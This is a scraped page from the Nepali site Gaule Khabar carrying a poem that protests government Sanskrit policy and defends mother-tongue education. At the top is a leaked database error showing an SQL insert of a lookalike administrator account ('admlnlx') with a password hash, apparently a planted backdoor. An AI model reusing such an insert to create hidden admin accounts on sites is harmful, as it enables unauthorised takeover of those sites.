WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCPN1B9HVVaZYLqylaYHIKN5EHWUSX0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 08:49:24', '', 'admlnlx', 'admlnlx')

कविता- मातृभाषाप्रतिको राजनीति छोड सरकार ! – Gaule Khabar

कविता- मातृभाषाप्रतिको राजनीति छोड सरकार !

युरिका सिङ्जाली मगरको कविता

कविता- मातृभाषाप्रतिको राजनीति छोड सरकार !

 

कवि युरिका सिङ्जाली मगरलाई सामाजिक संजालमा भेट्न यहाँ क्लिक गर्नुहोस् । । कवि तथा भाषिक अभियन्ता मगरले भाषाविज्ञानमा स्नातकोत्तर गरेकी हुन् ।

 

हे सरकार !

मातृभाषाले मातृभाषी समुदायलाई

झन पछि पार्छ भन्ने भ्रममा नपार

ती अबोध बालबालिकालाई

संस्कृत पढाई कलिलो मष्तिस्कमा बोझिलो नपार

 

हे सरकार!

कहाँ छन् संस्कृत भाषी समुदाय

लौन खुटाई दिनु पर्‍यो

भाषिक समुदाय नभए पछि

भाषिक वक्ताको कुरा चौकोष पर सर्नु पर्‍यो

 

हे सरकार !

सक्छौ त भाबीपिढीलाई आफ्नो मातृभाषामा

जीवन उपयोग र सिपमूलक शिक्षा देऊ

कक्षा कोठामै रुमलिएर बस्ने नपार

विचार पाउने छैन उनीहरु पढाईको भेउ

 

हे सरकार !

पूजापाठ र पशुपति नाथलाई मात्र

उहि संस्कृत भाषामा चढाइन्छ भेटी

अति भो अब छादिदेऊ

मातृभाषा प्रति गर्ने राजनीति सरकार ।

***

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका